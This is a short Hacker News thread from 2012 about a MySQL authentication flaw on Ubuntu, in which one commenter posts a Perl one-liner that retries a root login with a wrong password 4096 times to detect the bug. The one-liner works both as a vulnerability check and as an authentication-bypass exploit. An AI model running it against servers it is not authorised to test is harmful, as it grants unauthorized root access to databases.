Hacker News
new
|
past
|
comments
|
ask
|
show
|
jobs
|
submit
login
dangrossman
on June 11, 2012
|
parent
|
context
|
favorite
| on:
Security vulnerability in MySQL ubuntu
Try to connect to MySQL as root with a made-up password several hundred times. If you successfully connect, the bug is present and you know how it was compiled.
ushi
on June 11, 2012
|
next
[–]
Hehe, ok ok.
gringomorcego
on June 11, 2012
|
prev
[–]
where is the perl one-liner :P?
mcpherrinm
on June 11, 2012
|
parent
[–]
perl -e 'use DBI; for($i=0;$i<4096;$i++){DBI->connect("dbi:mysql:", "root", "nope", {PrintError=>0}) and die "Vulnerable!";}'
Guidelines
|
FAQ
|
Lists
|
API
|
Security
|
Legal
|
Apply to YC
|
Contact
Search: